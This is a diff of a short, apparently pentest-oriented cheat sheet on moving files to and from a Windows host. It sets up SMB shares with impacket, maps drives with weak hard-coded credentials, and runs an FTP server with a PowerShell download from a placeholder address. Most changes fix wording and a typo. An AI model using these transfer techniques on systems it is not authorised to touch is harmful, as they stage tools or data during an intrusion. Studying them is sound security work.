Connecting to an SMB share using PowerShell¶

 $cred = New-Object System.Management.Automation.PSCredential('hackfast',$pass)

-- Map the Network Drive
+- Map the network drive

 New-PSDrive -Name hackfast -PSProvider FileSystem -Credential $cred -Root \\[IP-ADDRESS]\hackfast

-- Navigate to the Mapped Drive
+- Navigate to the mapped drive

 cd hackfast:

-- Set Up an SMB Server
+- Set up an SMB server

 sudo impacket-smbserver share -smb2support .

-- Download a File from SMB Server:
+- Download a file from the SMB server

-copy \\[IP-ADRESS]\share\file.txt .
+copy \\[IP-ADDRESS]\share\file.txt .

-- Configure SMB Server Using impacket-smbserver
+- Configure the SMB server using impacket-smbserver

 sudo impacket-smbserver hackfast $(pwd) -smb2support -user hackfast -password hackfast

-- Configure SMB Server Using smbserver.py
+- Configure the SMB server using smbserver.py

 smbserver.py hackfast . -smb2support -username hackfast -password hackfast

-- Map a Network Drive
+- Map a network drive

-net use z: \\[IP-ADRESS]\hackfast /user:hackfast hackfast
+net use z: \\[IP-ADDRESS]\hackfast /user:hackfast hackfast

-- Copy a File from the Mapped Drive
+- Copy a file from the mapped drive

 copy z:\file.txt .

-- Start an FTP Server:
+- Start an FTP server

 sudo python3 -m pyftpdlib --port 21

-- Downloading a File Using PowerShell
+- Download a file using PowerShell

 (New-Object Net.WebClient).DownloadFile('ftp://[IP-ADDRESS]/file.txt', 'C:\Users\Public\file.txt')